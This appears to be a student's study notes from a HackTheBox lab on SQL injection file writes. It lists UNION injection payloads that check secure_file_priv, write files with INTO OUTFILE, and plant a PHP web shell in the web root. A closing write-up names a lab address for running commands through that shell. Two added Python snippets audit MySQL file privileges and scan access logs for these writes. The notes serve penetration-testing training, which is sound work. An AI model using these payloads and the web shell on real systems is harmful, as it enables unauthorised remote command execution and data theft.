# Writing Files

## secure_file_priv

```sql
SHOW VARIABLES LIKE 'secure_file_priv';
```

The final SQL query is the following:

```sql
SELECT variable_name, variable_value FROM information_schema.global_variables where variable_name="secure_file_priv"
```

So, similar to other `UNION` injection queries, we can get the above query result with the following payload. Remember to add two more columns, `1` and `4`, as junk data to have a total of 4 columns:

```sql
cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -
```


And the result shows that the `secure_file_priv` value is empty, meaning that we can read/write files to any location.
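From the defender's side, the same variable can be audited together with the application account's grants, because `INTO OUTFILE` needs both the `FILE` privilege and a permissive `secure_file_priv`. The following is an added example, not part of the original notes; the function names, the `webapp` account, the `shop` schema and the `/var/www/html` default are assumptions, and the grant lines are constructed.

```python
import posixpath
import re

GRANT_RE = re.compile(r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<scope>\S+)\s+TO\s", re.I)

# Constructed sample: SHOW GRANTS output for a hypothetical application account.
SAMPLE_GRANTS = [
    "GRANT SELECT, FILE ON *.* TO `webapp`@`localhost`",
    "GRANT ALL PRIVILEGES ON `shop`.* TO `webapp`@`localhost`",
]

def has_file_privilege(grants):
    """True if any SHOW GRANTS line gives FILE (or ALL PRIVILEGES) on *.*."""
    for line in grants:
        m = GRANT_RE.match(line.strip())
        if not m or m.group("scope").replace("`", "") != "*.*":
            continue  # FILE is a global privilege, so only *.* grants matter
        privs = {p.strip().upper() for p in m.group("privs").split(",")}
        if privs & {"FILE", "ALL", "ALL PRIVILEGES"}:
            return True
    return False

def outfile_exposure(secure_file_priv, grants, web_root="/var/www/html"):
    """Classify how far INTO OUTFILE can reach for this account.

    secure_file_priv: None for NULL, "" for empty, or a directory path.
    """
    if not has_file_privilege(grants):
        return "blocked: account lacks FILE"
    if secure_file_priv is None:
        return "blocked: secure_file_priv is NULL"
    if secure_file_priv == "":
        return "exposed: FILE granted and secure_file_priv is empty"
    allowed = posixpath.normpath(secure_file_priv)
    root = posixpath.normpath(web_root)
    # A permitted directory that contains, or sits inside, the web root
    # still lets exported files land where the web server will serve them.
    if posixpath.commonpath([allowed, root]) in (allowed, root):
        return "exposed: secure_file_priv overlaps the web root"
    return "restricted: writes limited to " + allowed
```

An empty value combined with `FILE` on `*.*` is the state this page's result shows; setting `secure_file_priv` to `NULL` or a dedicated directory outside the web root, or revoking `FILE` from the application account, moves the result to `blocked` or `restricted`.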

## SELECT INTO OUTFILE

To use `SELECT ... INTO OUTFILE`, we can add `INTO OUTFILE '...'` after our query to export the results into the file we specified. The below example saves the output of the `users` table into the `/tmp/credentials` file:

```sql
SELECT * from users INTO OUTFILE '/tmp/credentials';
```

If we go to the back-end server and `cat` the file, we see that table's content:

```shell-session
eldeim@htb[/htb]$ cat /tmp/credentials 
1       admin   392037dbba51f692776d6cefb6dd546d
2       newuser 9da2c9bcdf39d8610954e0e11ea8f45f
```

It is also possible to directly `SELECT` strings into files, allowing us to write arbitrary files to the back-end server.

```sql
SELECT 'this is a test' INTO OUTFILE '/tmp/test.txt';
```

When we `cat` the file, we see that text:

```shell-session
eldeim@htb[/htb]$ cat /tmp/test.txt 
this is a test
```

## Writing Files through SQL Injection

Let's try writing a text file to the webroot and verify if we have write permissions. The below query should write `file written successfully!` to the `/var/www/html/proof.txt` file, which we can then access on the web application:

```sql
select 'file written successfully!' into outfile '/var/www/html/proof.txt'
```

> To read the server configuration, like Apache's configuration found at `/etc/apache2/apache2.conf`, Nginx's configuration at `/etc/nginx/nginx.conf`, or IIS configuration at `%WinDir%\System32\Inetsrv\Config\ApplicationHost.config`.
>
> Or we can search online for other possible configuration locations. Furthermore, we may run a fuzzing scan and try to write files to different possible web roots, using [this wordlist for Linux](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-linux.txt) or [this wordlist for Windows](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-windows.txt).

The `UNION` injection payload would be as follows:

```sql
cn' union select 1,'file written successfully!',3,4 into outfile '/var/www/html/proof.txt'-- -
```


We don’t see any errors on the page, which indicates that the query succeeded. Checking for the file `proof.txt` in the webroot, we see that it indeed exists: `http://SERVER_IP:PORT/proof.txt`


### Writing a Web Shell

```php
<?php system($_REQUEST[0]); ?>
```

We can reuse our previous `UNION` injection payload, and change the string to the above, and the file name to `shell.php`:

```sql
cn' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- -
```


Once again, we don't see any errors, which means the file write probably worked. This can be verified by browsing to the `/shell.php` file and executing commands via the `0` parameter, with `?0=id` in our URL: `http://SERVER_IP:PORT/shell.php?0=id`
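The sequence in this section (probe `secure_file_priv`, write into the web root, then request the new file) leaves a recognizable trail in web access logs. The following detection sketch is an added example, not part of the original notes; the `/search.php` endpoint, the `port_code` parameter and the log lines are constructed, and only the `proof.txt` write from this page is replayed.

```python
import re
from urllib.parse import urlsplit, unquote_plus

WRITE_RE = re.compile(r"\binto\s+(?:outfile|dumpfile)\s+['\"]([^'\"]+)['\"]", re.I)
PROBE_RE = re.compile(r"secure_file_priv", re.I)
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed sample lines; /search.php and port_code are hypothetical names.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /search.php?port_code=cn HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /search.php?port_code=cn%27+UNION+SELECT+1'
    '%2Cvariable_name%2Cvariable_value%2C4+FROM+information_schema.global_variables'
    '+where+variable_name%3D%22secure_file_priv%22--+- HTTP/1.1" 200 734',
    '203.0.113.7 - - [01/Jan/2024:10:00:31 +0000] "GET /search.php?port_code=cn%27+union+select+1'
    '%2C%27file+written+successfully%21%27%2C3%2C4+into+outfile'
    '+%27%2Fvar%2Fwww%2Fhtml%2Fproof.txt%27--+- HTTP/1.1" 200 498',
    '203.0.113.7 - - [01/Jan/2024:10:00:40 +0000] "GET /proof.txt HTTP/1.1" 200 31',
]

def decode(value, rounds=2):
    """URL-decode repeatedly so double-encoded payloads are still matched."""
    for _ in range(rounds):
        value = unquote_plus(value)
    return value

def scan_access_log(lines, web_root="/var/www/html"):
    """Return (line_no, finding) tuples for file-write SQLi indicators."""
    findings, written = [], set()
    root = web_root.rstrip("/")
    for no, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        parts, status = urlsplit(m.group(1)), m.group(2)
        query = decode(parts.query)
        w = WRITE_RE.search(query)
        if w:
            findings.append((no, "outfile write to " + w.group(1)))
            if w.group(1).startswith(root + "/"):
                written.add(w.group(1)[len(root):])  # URL path of the new file
        elif PROBE_RE.search(query):
            findings.append((no, "secure_file_priv probe"))
        # A 200 on a path an earlier request tried to write means the
        # write landed in the web root and the file is being served.
        if parts.path in written and status == "200":
            findings.append((no, "served injected file " + parts.path))
    return findings
```

Payloads sent in POST bodies do not reach the access log, so the same patterns should also be matched against the database's query log or WAF request logs where those are available.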


## WriteUp

```sql
cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -
```


```sql
cn' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- -
```


Now browse to `http://83.136.252.13:50193/shell.php?0=id`


